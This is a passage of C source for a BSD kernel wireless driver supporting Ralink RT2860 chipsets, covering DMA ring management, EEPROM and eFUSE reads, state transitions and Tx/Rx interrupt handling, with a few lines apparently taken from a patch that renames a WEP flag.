int rt2860_detach(void *xsc) { struct rt2860_softc *sc = xsc; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; int qid; RAL_LOCK(sc); rt2860_stop_locked(sc); RAL_UNLOCK(sc); ieee80211_ifdetach(ic); for (qid = 0; qid < 6; qid++) rt2860_free_tx_ring(sc, &sc->txq[qid]); rt2860_free_rx_ring(sc, &sc->rxq); rt2860_free_tx_pool(sc); if_free(ifp); mtx_destroy(&sc->sc_mtx); return 0; } void rt2860_shutdown(void *xsc) { struct rt2860_softc *sc = xsc; rt2860_stop(sc); } void rt2860_suspend(void *xsc) { struct rt2860_softc *sc = xsc; rt2860_stop(sc); } void rt2860_resume(void *xsc) { struct rt2860_softc *sc = xsc; struct ifnet *ifp = sc->sc_ifp; if (ifp->if_flags & IFF_UP) rt2860_init(sc); } static struct ieee80211vap * rt2860_vap_create(struct ieee80211com *ic, const char name[IFNAMSIZ], int unit, enum ieee80211_opmode opmode, int flags, const uint8_t bssid[IEEE80211_ADDR_LEN], const uint8_t mac[IEEE80211_ADDR_LEN]) { struct ifnet *ifp = ic->ic_ifp; struct rt2860_vap *rvp; struct ieee80211vap *vap; switch (opmode) { case IEEE80211_M_STA: case IEEE80211_M_IBSS: case IEEE80211_M_AHDEMO: case IEEE80211_M_MONITOR: case IEEE80211_M_HOSTAP: case IEEE80211_M_MBSS: /* XXXRP: TBD */ if (!TAILQ_EMPTY(&ic->ic_vaps)) { if_printf(ifp, "only 1 vap supported\n"); return NULL; } if (opmode == IEEE80211_M_STA) flags |= IEEE80211_CLONE_NOBEACONS; break; case IEEE80211_M_WDS: if (TAILQ_EMPTY(&ic->ic_vaps) || ic->ic_opmode != IEEE80211_M_HOSTAP) { if_printf(ifp, "wds only supported in ap mode\n"); return NULL; } /* * Silently remove any request for a unique * bssid; WDS vap's always share the local * mac address. */ flags &= ~IEEE80211_CLONE_BSSID; break; default: if_printf(ifp, "unknown opmode %d\n", opmode); return NULL; } rvp = malloc(sizeof(struct rt2860_vap), M_80211_VAP, M_NOWAIT | M_ZERO); if (rvp == NULL) return NULL; vap = &rvp->ral_vap; ieee80211_vap_setup(ic, vap, name, unit, opmode, flags, bssid, mac); /* override state transition machine */ rvp->ral_newstate = vap->iv_newstate; vap->iv_newstate = rt2860_newstate; #if 0 vap->iv_update_beacon = rt2860_beacon_update; #endif /* HW supports up to 255 STAs (0-254) in HostAP and IBSS modes */ vap->iv_max_aid = min(IEEE80211_AID_MAX, RT2860_WCID_MAX); ieee80211_ratectl_init(vap); /* complete setup */ ieee80211_vap_attach(vap, ieee80211_media_change, ieee80211_media_status); if (TAILQ_FIRST(&ic->ic_vaps) == vap) ic->ic_opmode = opmode; return vap; } static void rt2860_vap_delete(struct ieee80211vap *vap) { struct rt2860_vap *rvp = RT2860_VAP(vap); ieee80211_ratectl_deinit(vap); ieee80211_vap_detach(vap); free(rvp, M_80211_VAP); } static void rt2860_dma_map_addr(void *arg, bus_dma_segment_t *segs, int nseg, int error) { if (error != 0) return; KASSERT(nseg == 1, ("too many DMA segments, %d should be 1", nseg)); *(bus_addr_t *)arg = segs[0].ds_addr; } static int rt2860_alloc_tx_ring(struct rt2860_softc *sc, struct rt2860_tx_ring *ring) { int size, error; size = RT2860_TX_RING_COUNT * sizeof (struct rt2860_txd); error = bus_dma_tag_create(bus_get_dma_tag(sc->sc_dev), 16, 0, BUS_SPACE_MAXADDR_32BIT, BUS_SPACE_MAXADDR, NULL, NULL, size, 1, size, 0, NULL, NULL, &ring->desc_dmat); if (error != 0) { device_printf(sc->sc_dev, "could not create desc DMA map\n"); goto fail; } error = bus_dmamem_alloc(ring->desc_dmat, (void **)&ring->txd, BUS_DMA_NOWAIT | BUS_DMA_ZERO, &ring->desc_map); if (error != 0) { device_printf(sc->sc_dev, "could not allocate DMA memory\n"); goto fail; } error = bus_dmamap_load(ring->desc_dmat, ring->desc_map, ring->txd, size, 
rt2860_dma_map_addr, &ring->paddr, 0); if (error != 0) { device_printf(sc->sc_dev, "could not load desc DMA map\n"); goto fail; } bus_dmamap_sync(ring->desc_dmat, ring->desc_map, BUS_DMASYNC_PREWRITE); return 0; fail: rt2860_free_tx_ring(sc, ring); return error; } void rt2860_reset_tx_ring(struct rt2860_softc *sc, struct rt2860_tx_ring *ring) { struct rt2860_tx_data *data; int i; for (i = 0; i < RT2860_TX_RING_COUNT; i++) { if ((data = ring->data[i]) == NULL) continue; /* nothing mapped in this slot */ if (data->m != NULL) { bus_dmamap_sync(sc->txwi_dmat, data->map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(sc->txwi_dmat, data->map); m_freem(data->m); data->m = NULL; } if (data->ni != NULL) { ieee80211_free_node(data->ni); data->ni = NULL; } SLIST_INSERT_HEAD(&sc->data_pool, data, next); ring->data[i] = NULL; } ring->queued = 0; ring->cur = ring->next = 0; } void rt2860_free_tx_ring(struct rt2860_softc *sc, struct rt2860_tx_ring *ring) { struct rt2860_tx_data *data; int i; if (ring->txd != NULL) { bus_dmamap_sync(ring->desc_dmat, ring->desc_map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(ring->desc_dmat, ring->desc_map); bus_dmamem_free(ring->desc_dmat, ring->txd, ring->desc_map); } if (ring->desc_dmat != NULL) bus_dma_tag_destroy(ring->desc_dmat); for (i = 0; i < RT2860_TX_RING_COUNT; i++) { if ((data = ring->data[i]) == NULL) continue; /* nothing mapped in this slot */ if (data->m != NULL) { bus_dmamap_sync(sc->txwi_dmat, data->map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(sc->txwi_dmat, data->map); m_freem(data->m); } if (data->ni != NULL) ieee80211_free_node(data->ni); SLIST_INSERT_HEAD(&sc->data_pool, data, next); } } /* * Allocate a pool of TX Wireless Information blocks. */ int rt2860_alloc_tx_pool(struct rt2860_softc *sc) { caddr_t vaddr; bus_addr_t paddr; int i, size, error; size = RT2860_TX_POOL_COUNT * RT2860_TXWI_DMASZ; /* init data_pool early in case of failure.. 
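(rt2860_free_tx_pool() walks this list on the error path, so it must be initialized even if the allocations below fail)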
*/ SLIST_INIT(&sc->data_pool); error = bus_dma_tag_create(bus_get_dma_tag(sc->sc_dev), 1, 0, BUS_SPACE_MAXADDR_32BIT, BUS_SPACE_MAXADDR, NULL, NULL, size, 1, size, 0, NULL, NULL, &sc->txwi_dmat); if (error != 0) { device_printf(sc->sc_dev, "could not create txwi DMA tag\n"); goto fail; } error = bus_dmamem_alloc(sc->txwi_dmat, (void **)&sc->txwi_vaddr, BUS_DMA_NOWAIT | BUS_DMA_ZERO, &sc->txwi_map); if (error != 0) { device_printf(sc->sc_dev, "could not allocate DMA memory\n"); goto fail; } error = bus_dmamap_load(sc->txwi_dmat, sc->txwi_map, sc->txwi_vaddr, size, rt2860_dma_map_addr, &paddr, 0); if (error != 0) { device_printf(sc->sc_dev, "could not load txwi DMA map\n"); goto fail; } bus_dmamap_sync(sc->txwi_dmat, sc->txwi_map, BUS_DMASYNC_PREWRITE); vaddr = sc->txwi_vaddr; for (i = 0; i < RT2860_TX_POOL_COUNT; i++) { struct rt2860_tx_data *data = &sc->data[i]; error = bus_dmamap_create(sc->txwi_dmat, 0, &data->map); if (error != 0) { device_printf(sc->sc_dev, "could not create DMA map\n"); goto fail; } data->txwi = (struct rt2860_txwi *)vaddr; data->paddr = paddr; vaddr += RT2860_TXWI_DMASZ; paddr += RT2860_TXWI_DMASZ; SLIST_INSERT_HEAD(&sc->data_pool, data, next); } return 0; fail: rt2860_free_tx_pool(sc); return error; } void rt2860_free_tx_pool(struct rt2860_softc *sc) { if (sc->txwi_vaddr != NULL) { bus_dmamap_sync(sc->txwi_dmat, sc->txwi_map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(sc->txwi_dmat, sc->txwi_map); bus_dmamem_free(sc->txwi_dmat, sc->txwi_vaddr, sc->txwi_map); } if (sc->txwi_dmat != NULL) bus_dma_tag_destroy(sc->txwi_dmat); while (!SLIST_EMPTY(&sc->data_pool)) { struct rt2860_tx_data *data; data = SLIST_FIRST(&sc->data_pool); bus_dmamap_destroy(sc->txwi_dmat, data->map); SLIST_REMOVE_HEAD(&sc->data_pool, next); } } int rt2860_alloc_rx_ring(struct rt2860_softc *sc, struct rt2860_rx_ring *ring) { bus_addr_t physaddr; int i, size, error; size = RT2860_RX_RING_COUNT * sizeof (struct rt2860_rxd); error = bus_dma_tag_create(bus_get_dma_tag(sc->sc_dev), 16, 0, BUS_SPACE_MAXADDR_32BIT, BUS_SPACE_MAXADDR, NULL, NULL, size, 1, size, 0, NULL, NULL, &ring->desc_dmat); if (error != 0) { device_printf(sc->sc_dev, "could not create desc DMA tag\n"); goto fail; } error = bus_dmamem_alloc(ring->desc_dmat, (void **)&ring->rxd, BUS_DMA_NOWAIT | BUS_DMA_ZERO, &ring->desc_map); if (error != 0) { device_printf(sc->sc_dev, "could not allocate DMA memory\n"); goto fail; } error = bus_dmamap_load(ring->desc_dmat, ring->desc_map, ring->rxd, size, rt2860_dma_map_addr, &ring->paddr, 0); if (error != 0) { device_printf(sc->sc_dev, "could not load desc DMA map\n"); goto fail; } error = bus_dma_tag_create(bus_get_dma_tag(sc->sc_dev), 1, 0, BUS_SPACE_MAXADDR_32BIT, BUS_SPACE_MAXADDR, NULL, NULL, MCLBYTES, 1, MCLBYTES, 0, NULL, NULL, &ring->data_dmat); if (error != 0) { device_printf(sc->sc_dev, "could not create data DMA tag\n"); goto fail; } for (i = 0; i < RT2860_RX_RING_COUNT; i++) { struct rt2860_rx_data *data = &ring->data[i]; struct rt2860_rxd *rxd = &ring->rxd[i]; error = bus_dmamap_create(ring->data_dmat, 0, &data->map); if (error != 0) { device_printf(sc->sc_dev, "could not create DMA map\n"); goto fail; } data->m = m_getcl(M_NOWAIT, MT_DATA, M_PKTHDR); if (data->m == NULL) { device_printf(sc->sc_dev, "could not allocate rx mbuf\n"); error = ENOMEM; goto fail; } error = bus_dmamap_load(ring->data_dmat, data->map, mtod(data->m, void *), MCLBYTES, rt2860_dma_map_addr, &physaddr, 0); if (error != 0) { device_printf(sc->sc_dev, "could not load rx buf DMA map"); goto fail; } rxd->sdp0 = 
htole32(physaddr); rxd->sdl0 = htole16(MCLBYTES); } bus_dmamap_sync(ring->desc_dmat, ring->desc_map, BUS_DMASYNC_PREWRITE); return 0; fail: rt2860_free_rx_ring(sc, ring); return error; } void rt2860_reset_rx_ring(struct rt2860_softc *sc, struct rt2860_rx_ring *ring) { int i; for (i = 0; i < RT2860_RX_RING_COUNT; i++) ring->rxd[i].sdl0 &= ~htole16(RT2860_RX_DDONE); bus_dmamap_sync(ring->desc_dmat, ring->desc_map, BUS_DMASYNC_PREWRITE); ring->cur = 0; } void rt2860_free_rx_ring(struct rt2860_softc *sc, struct rt2860_rx_ring *ring) { int i; if (ring->rxd != NULL) { bus_dmamap_sync(ring->desc_dmat, ring->desc_map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(ring->desc_dmat, ring->desc_map); bus_dmamem_free(ring->desc_dmat, ring->rxd, ring->desc_map); } if (ring->desc_dmat != NULL) bus_dma_tag_destroy(ring->desc_dmat); for (i = 0; i < RT2860_RX_RING_COUNT; i++) { struct rt2860_rx_data *data = &ring->data[i]; if (data->m != NULL) { bus_dmamap_sync(ring->data_dmat, data->map, BUS_DMASYNC_POSTREAD); bus_dmamap_unload(ring->data_dmat, data->map); m_freem(data->m); } if (data->map != NULL) bus_dmamap_destroy(ring->data_dmat, data->map); } if (ring->data_dmat != NULL) bus_dma_tag_destroy(ring->data_dmat); } static void rt2860_updatestats(struct rt2860_softc *sc) { struct ieee80211com *ic = sc->sc_ifp->if_l2com; /* * In IBSS or HostAP modes (when the hardware sends beacons), the * MAC can run into a livelock and start sending CTS-to-self frames * like crazy if protection is enabled. Fortunately, we can detect * when such a situation occurs and reset the MAC. */ if (ic->ic_curmode != IEEE80211_M_STA) { /* check if we're in a livelock situation.. */ uint32_t tmp = RAL_READ(sc, RT2860_DEBUG); if ((tmp & (1 << 29)) && (tmp & (1 << 7 | 1 << 5))) { /* ..and reset MAC/BBP for a while.. 
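(pulse RT2860_MAC_SRST, then re-enable the Rx and Tx engines)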
*/ DPRINTF(("CTS-to-self livelock detected\n")); RAL_WRITE(sc, RT2860_MAC_SYS_CTRL, RT2860_MAC_SRST); RAL_BARRIER_WRITE(sc); DELAY(1); RAL_WRITE(sc, RT2860_MAC_SYS_CTRL, RT2860_MAC_RX_EN | RT2860_MAC_TX_EN); } } } static void rt2860_newassoc(struct ieee80211_node *ni, int isnew) { struct ieee80211com *ic = ni->ni_ic; struct rt2860_softc *sc = ic->ic_ifp->if_softc; uint8_t wcid; wcid = IEEE80211_AID(ni->ni_associd); if (isnew && ni->ni_associd != 0) { sc->wcid2ni[wcid] = ni; /* init WCID table entry */ RAL_WRITE_REGION_1(sc, RT2860_WCID_ENTRY(wcid), ni->ni_macaddr, IEEE80211_ADDR_LEN); } DPRINTF(("new assoc isnew=%d addr=%s WCID=%d\n", isnew, ether_sprintf(ni->ni_macaddr), wcid)); } static void rt2860_node_free(struct ieee80211_node *ni) { struct ieee80211com *ic = ni->ni_ic; struct rt2860_softc *sc = ic->ic_ifp->if_softc; uint8_t wcid; if (ni->ni_associd != 0) { wcid = IEEE80211_AID(ni->ni_associd); /* clear Rx WCID search table entry */ RAL_SET_REGION_4(sc, RT2860_WCID_ENTRY(wcid), 0, 2); } sc->sc_node_free(ni); } #ifdef IEEE80211_HT static int rt2860_ampdu_rx_start(struct ieee80211com *ic, struct ieee80211_node *ni, uint8_t tid) { struct rt2860_softc *sc = ic->ic_softc; uint8_t wcid = ((struct rt2860_node *)ni)->wcid; uint32_t tmp; /* update BA session mask */ tmp = RAL_READ(sc, RT2860_WCID_ENTRY(wcid) + 4); tmp |= (1 << tid) << 16; RAL_WRITE(sc, RT2860_WCID_ENTRY(wcid) + 4, tmp); return 0; } static void rt2860_ampdu_rx_stop(struct ieee80211com *ic, struct ieee80211_node *ni, uint8_t tid) { struct rt2860_softc *sc = ic->ic_softc; uint8_t wcid = ((struct rt2860_node *)ni)->wcid; uint32_t tmp; /* update BA session mask */ tmp = RAL_READ(sc, RT2860_WCID_ENTRY(wcid) + 4); tmp &= ~((1 << tid) << 16); RAL_WRITE(sc, RT2860_WCID_ENTRY(wcid) + 4, tmp); } #endif int rt2860_newstate(struct ieee80211vap *vap, enum ieee80211_state nstate, int arg) { struct rt2860_vap *rvp = RT2860_VAP(vap); struct ieee80211com *ic = vap->iv_ic; struct rt2860_softc *sc = ic->ic_ifp->if_softc; uint32_t tmp; int error; if (vap->iv_state == IEEE80211_S_RUN) { /* turn link LED off */ rt2860_set_leds(sc, RT2860_LED_RADIO); } if (nstate == IEEE80211_S_INIT && vap->iv_state == IEEE80211_S_RUN) { /* abort TSF synchronization */ tmp = RAL_READ(sc, RT2860_BCN_TIME_CFG); RAL_WRITE(sc, RT2860_BCN_TIME_CFG, tmp & ~(RT2860_BCN_TX_EN | RT2860_TSF_TIMER_EN | RT2860_TBTT_TIMER_EN)); } rt2860_set_gp_timer(sc, 0); error = rvp->ral_newstate(vap, nstate, arg); if (error != 0) return (error); if (nstate == IEEE80211_S_RUN) { struct ieee80211_node *ni = vap->iv_bss; if (ic->ic_opmode != IEEE80211_M_MONITOR) { rt2860_enable_mrr(sc); rt2860_set_txpreamble(sc); rt2860_set_basicrates(sc, &ni->ni_rates); rt2860_set_bssid(sc, ni->ni_bssid); } if (vap->iv_opmode == IEEE80211_M_HOSTAP || vap->iv_opmode == IEEE80211_M_IBSS || vap->iv_opmode == IEEE80211_M_MBSS) { error = rt2860_setup_beacon(sc, vap); if (error != 0) return error; } if (ic->ic_opmode != IEEE80211_M_MONITOR) { rt2860_enable_tsf_sync(sc); rt2860_set_gp_timer(sc, 500); } /* turn link LED on */ rt2860_set_leds(sc, RT2860_LED_RADIO | (IEEE80211_IS_CHAN_2GHZ(ni->ni_chan) ? RT2860_LED_LINK_2GHZ : RT2860_LED_LINK_5GHZ)); } return error; } /* Read 16-bit from eFUSE ROM (>=RT3071 only.) 
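(EEPROM-less RT30xx parts expose their calibration data through this interface; sc->sc_srom_read selects between this routine and rt2860_eeprom_read_2)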
*/ static uint16_t rt3090_efuse_read_2(struct rt2860_softc *sc, uint16_t addr) { uint32_t tmp; uint16_t reg; int ntries; addr *= 2; /*- * Read one 16-byte block into registers EFUSE_DATA[0-3]: * DATA0: F E D C * DATA1: B A 9 8 * DATA2: 7 6 5 4 * DATA3: 3 2 1 0 */ tmp = RAL_READ(sc, RT3070_EFUSE_CTRL); tmp &= ~(RT3070_EFSROM_MODE_MASK | RT3070_EFSROM_AIN_MASK); tmp |= (addr & ~0xf) << RT3070_EFSROM_AIN_SHIFT | RT3070_EFSROM_KICK; RAL_WRITE(sc, RT3070_EFUSE_CTRL, tmp); for (ntries = 0; ntries < 500; ntries++) { tmp = RAL_READ(sc, RT3070_EFUSE_CTRL); if (!(tmp & RT3070_EFSROM_KICK)) break; DELAY(2); } if (ntries == 500) return 0xffff; if ((tmp & RT3070_EFUSE_AOUT_MASK) == RT3070_EFUSE_AOUT_MASK) return 0xffff; /* address not found */ /* determine to which 32-bit register our 16-bit word belongs */ reg = RT3070_EFUSE_DATA3 - (addr & 0xc); tmp = RAL_READ(sc, reg); return (addr & 2) ? tmp >> 16 : tmp & 0xffff; } /* * Read 16 bits at address 'addr' from the serial EEPROM (either 93C46, * 93C66 or 93C86). */ static uint16_t rt2860_eeprom_read_2(struct rt2860_softc *sc, uint16_t addr) { uint32_t tmp; uint16_t val; int n; /* clock C once before the first command */ RT2860_EEPROM_CTL(sc, 0); RT2860_EEPROM_CTL(sc, RT2860_S); RT2860_EEPROM_CTL(sc, RT2860_S | RT2860_C); RT2860_EEPROM_CTL(sc, RT2860_S); /* write start bit (1) */ RT2860_EEPROM_CTL(sc, RT2860_S | RT2860_D); RT2860_EEPROM_CTL(sc, RT2860_S | RT2860_D | RT2860_C); /* write READ opcode (10) */ RT2860_EEPROM_CTL(sc, RT2860_S | RT2860_D); RT2860_EEPROM_CTL(sc, RT2860_S | RT2860_D | RT2860_C); RT2860_EEPROM_CTL(sc, RT2860_S); RT2860_EEPROM_CTL(sc, RT2860_S | RT2860_C); /* write address (A5-A0 or A7-A0) */ n = ((RAL_READ(sc, RT2860_PCI_EECTRL) & 0x30) == 0) ? 5 : 7; for (; n >= 0; n--) { RT2860_EEPROM_CTL(sc, RT2860_S | (((addr >> n) & 1) << RT2860_SHIFT_D)); RT2860_EEPROM_CTL(sc, RT2860_S | (((addr >> n) & 1) << RT2860_SHIFT_D) | RT2860_C); } RT2860_EEPROM_CTL(sc, RT2860_S); /* read data Q15-Q0 */ val = 0; for (n = 15; n >= 0; n--) { RT2860_EEPROM_CTL(sc, RT2860_S | RT2860_C); tmp = RAL_READ(sc, RT2860_PCI_EECTRL); val |= ((tmp & RT2860_Q) >> RT2860_SHIFT_Q) << n; RT2860_EEPROM_CTL(sc, RT2860_S); } RT2860_EEPROM_CTL(sc, 0); /* clear Chip Select and clock C */ RT2860_EEPROM_CTL(sc, RT2860_S); RT2860_EEPROM_CTL(sc, 0); RT2860_EEPROM_CTL(sc, RT2860_C); return val; } static __inline uint16_t rt2860_srom_read(struct rt2860_softc *sc, uint8_t addr) { /* either eFUSE ROM or EEPROM */ return sc->sc_srom_read(sc, addr); } static void rt2860_intr_coherent(struct rt2860_softc *sc) { uint32_t tmp; /* DMA finds data coherent event when checking the DDONE bit */ DPRINTF(("Tx/Rx Coherent interrupt\n")); /* restart DMA engine */ tmp = RAL_READ(sc, RT2860_WPDMA_GLO_CFG); tmp &= ~(RT2860_TX_WB_DDONE | RT2860_RX_DMA_EN | RT2860_TX_DMA_EN); RAL_WRITE(sc, RT2860_WPDMA_GLO_CFG, tmp); (void)rt2860_txrx_enable(sc); } static void rt2860_drain_stats_fifo(struct rt2860_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211_node *ni; uint32_t stat; int retrycnt; uint8_t wcid, mcs, pid; /* drain Tx status FIFO (maxsize = 16) */ while ((stat = RAL_READ(sc, RT2860_TX_STAT_FIFO)) & RT2860_TXQ_VLD) { DPRINTFN(4, ("tx stat 0x%08x\n", stat)); wcid = (stat >> RT2860_TXQ_WCID_SHIFT) & 0xff; ni = sc->wcid2ni[wcid]; /* if no ACK was requested, no feedback is available */ if (!(stat & RT2860_TXQ_ACKREQ) || wcid == 0xff || ni == NULL) continue; /* update per-STA AMRR stats */ if (stat & RT2860_TXQ_OK) { /* * Check if there were retries, ie if the Tx success * rate is different 
from the requested rate. Note * that it works only because we do not allow rate * fallback from OFDM to CCK. */ mcs = (stat >> RT2860_TXQ_MCS_SHIFT) & 0x7f; pid = (stat >> RT2860_TXQ_PID_SHIFT) & 0xf; if (mcs + 1 != pid) retrycnt = 1; else retrycnt = 0; ieee80211_ratectl_tx_complete(ni->ni_vap, ni, IEEE80211_RATECTL_TX_SUCCESS, &retrycnt, NULL); } else { ieee80211_ratectl_tx_complete(ni->ni_vap, ni, IEEE80211_RATECTL_TX_FAILURE, &retrycnt, NULL); ifp->if_oerrors++; } } } static void rt2860_tx_intr(struct rt2860_softc *sc, int qid) { struct ifnet *ifp = sc->sc_ifp; struct rt2860_tx_ring *ring = &sc->txq[qid]; uint32_t hw; rt2860_drain_stats_fifo(sc); hw = RAL_READ(sc, RT2860_TX_DTX_IDX(qid)); while (ring->next != hw) { struct rt2860_tx_data *data = ring->data[ring->next]; if (data != NULL) { bus_dmamap_sync(sc->txwi_dmat, data->map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(sc->txwi_dmat, data->map); if (data->m->m_flags & M_TXCB) { ieee80211_process_callback(data->ni, data->m, 0); } m_freem(data->m); ieee80211_free_node(data->ni); data->m = NULL; data->ni = NULL; SLIST_INSERT_HEAD(&sc->data_pool, data, next); ring->data[ring->next] = NULL; ifp->if_opackets++; } ring->queued--; ring->next = (ring->next + 1) % RT2860_TX_RING_COUNT; } sc->sc_tx_timer = 0; if (ring->queued < RT2860_TX_RING_COUNT) sc->qfullmsk &= ~(1 << qid); ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; rt2860_start_locked(ifp); } /* * Return the Rx chain with the highest RSSI for a given frame. */ static __inline uint8_t rt2860_maxrssi_chain(struct rt2860_softc *sc, const struct rt2860_rxwi *rxwi) { uint8_t rxchain = 0; if (sc->nrxchains > 1) { if (rxwi->rssi[1] > rxwi->rssi[rxchain]) rxchain = 1; if (sc->nrxchains > 2) if (rxwi->rssi[2] > rxwi->rssi[rxchain]) rxchain = 2; } return rxchain; } static void rt2860_rx_intr(struct rt2860_softc *sc) { struct rt2860_rx_radiotap_header *tap; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211_frame *wh; struct ieee80211_node *ni; struct mbuf *m, *m1; bus_addr_t physaddr; uint32_t hw; uint16_t phy; uint8_t ant; int8_t rssi, nf; int error; hw = RAL_READ(sc, RT2860_FS_DRX_IDX) & 0xfff; while (sc->rxq.cur != hw) { struct rt2860_rx_data *data = &sc->rxq.data[sc->rxq.cur]; struct rt2860_rxd *rxd = &sc->rxq.rxd[sc->rxq.cur]; struct rt2860_rxwi *rxwi; bus_dmamap_sync(sc->rxq.desc_dmat, sc->rxq.desc_map, BUS_DMASYNC_POSTREAD); if (__predict_false(!(rxd->sdl0 & htole16(RT2860_RX_DDONE)))) { DPRINTF(("RXD DDONE bit not set!\n")); break; /* should not happen */ } if (__predict_false(rxd->flags & htole32(RT2860_RX_CRCERR | RT2860_RX_ICVERR))) { ifp->if_ierrors++; goto skip; } #ifdef HW_CRYPTO if (__predict_false(rxd->flags & htole32(RT2860_RX_MICERR))) { /* report MIC failures to net80211 for TKIP */ ic->ic_stats.is_rx_locmicfail++; ieee80211_michael_mic_failure(ic, 0/* XXX */); ifp->if_ierrors++; goto skip; } #endif m1 = m_getcl(M_NOWAIT, MT_DATA, M_PKTHDR); if (__predict_false(m1 == NULL)) { ifp->if_ierrors++; goto skip; } bus_dmamap_sync(sc->rxq.data_dmat, data->map, BUS_DMASYNC_POSTREAD); bus_dmamap_unload(sc->rxq.data_dmat, data->map); error = bus_dmamap_load(sc->rxq.data_dmat, data->map, mtod(m1, void *), MCLBYTES, rt2860_dma_map_addr, &physaddr, 0); if (__predict_false(error != 0)) { m_freem(m1); /* try to reload the old mbuf */ error = bus_dmamap_load(sc->rxq.data_dmat, data->map, mtod(data->m, void *), MCLBYTES, rt2860_dma_map_addr, &physaddr, 0); if (__predict_false(error != 0)) { panic("%s: could not load old rx mbuf", device_get_name(sc->sc_dev)); } /* 
physical address may have changed */ rxd->sdp0 = htole32(physaddr); ifp->if_ierrors++; goto skip; } /* * New mbuf successfully loaded, update Rx ring and continue * processing. */ m = data->m; data->m = m1; rxd->sdp0 = htole32(physaddr); rxwi = mtod(m, struct rt2860_rxwi *); /* finalize mbuf */ m->m_pkthdr.rcvif = ifp; m->m_data = (caddr_t)(rxwi + 1); m->m_pkthdr.len = m->m_len = le16toh(rxwi->len) & 0xfff; wh = mtod(m, struct ieee80211_frame *); #ifdef HW_CRYPTO - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { /* frame is decrypted by hardware */ - wh->i_fc[1] &= ~IEEE80211_FC1_WEP; + wh->i_fc[1] &= ~IEEE80211_FC1_PROTECTED; } #endif /* HW may insert 2 padding bytes after 802.11 header */ if (rxd->flags & htole32(RT2860_RX_L2PAD)) { u_int hdrlen = ieee80211_hdrsize(wh); ovbcopy(wh, (caddr_t)wh + 2, hdrlen); m->m_data += 2; wh = mtod(m, struct ieee80211_frame *); } ant = rt2860_maxrssi_chain(sc, rxwi); rssi = rt2860_rssi2dbm(sc, rxwi->rssi[ant], ant); nf = RT2860_NOISE_FLOOR; if (ieee80211_radiotap_active(ic)) { tap = &sc->sc_rxtap; tap->wr_flags = 0; tap->wr_antenna = ant; tap->wr_antsignal = nf + rssi; tap->wr_antnoise = nf; /* in case it can't be found below */ tap->wr_rate = 2; phy = le16toh(rxwi->phy); switch (phy & RT2860_PHY_MODE) { case RT2860_PHY_CCK: switch ((phy & RT2860_PHY_MCS) & ~RT2860_PHY_SHPRE) { case 0: tap->wr_rate = 2; break; case 1: tap->wr_rate = 4; break; case 2: tap->wr_rate = 11; break; case 3: tap->wr_rate = 22; break; } if (phy & RT2860_PHY_SHPRE) tap->wr_flags |= IEEE80211_RADIOTAP_F_SHORTPRE; break; case RT2860_PHY_OFDM: switch (phy & RT2860_PHY_MCS) { case 0: tap->wr_rate = 12; break; case 1: tap->wr_rate = 18; break; case 2: tap->wr_rate = 24; break; case 3: tap->wr_rate = 36; break; case 4: tap->wr_rate = 48; break; case 5: tap->wr_rate = 72; break; case 6: tap->wr_rate = 96; break; case 7: tap->wr_rate = 108; break; } break; } } RAL_UNLOCK(sc); wh = mtod(m, struct ieee80211_frame *); /* send the frame to the 802.11 layer */ ni = ieee80211_find_rxnode(ic, (struct ieee80211_frame_min *)wh); if (ni != NULL) { (void)ieee80211_input(ni, m, rssi - nf, nf); ieee80211_free_node(ni); } else (void)ieee80211_input_all(ic, m, rssi - nf, nf); RAL_LOCK(sc); skip: rxd->sdl0 &= ~htole16(RT2860_RX_DDONE); bus_dmamap_sync(sc->rxq.desc_dmat, sc->rxq.desc_map, BUS_DMASYNC_PREWRITE); sc->rxq.cur = (sc->rxq.cur + 1) % RT2860_RX_RING_COUNT; } /* tell HW what we have processed */ RAL_WRITE(sc, RT2860_RX_CALC_IDX, (sc->rxq.cur - 1) % RT2860_RX_RING_COUNT); } static void rt2860_tbtt_intr(struct rt2860_softc *sc) { #if 0 struct ieee80211com *ic = &sc->sc_ic; #ifndef IEEE80211_STA_ONLY if (ic->ic_opmode == IEEE80211_M_HOSTAP) { /* one less beacon until next DTIM */ if (ic->ic_dtim_count == 0) ic->ic_dtim_count = ic->ic_dtim_period - 1; else ic->ic_dtim_count--; /* update dynamic parts of beacon */ rt2860_setup_beacon(sc); /* flush buffered multicast frames */ if (ic->ic_dtim_count == 0) ieee80211_notify_dtim(ic); } #endif /* check if protection mode has changed */ if ((sc->sc_ic_flags ^ ic->ic_flags) & IEEE80211_F_USEPROT) { rt2860_updateprot(ic); sc->sc_ic_flags = ic->ic_flags; } #endif } static void rt2860_gp_intr(struct rt2860_softc *sc) { struct ieee80211com *ic = sc->sc_ifp->if_l2com; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); DPRINTFN(2, ("GP timeout state=%d\n", vap->iv_state)); if (vap->iv_state == IEEE80211_S_RUN) rt2860_updatestats(sc); } void rt2860_intr(void *arg) { struct rt2860_softc *sc = arg; uint32_t r; RAL_LOCK(sc); r 
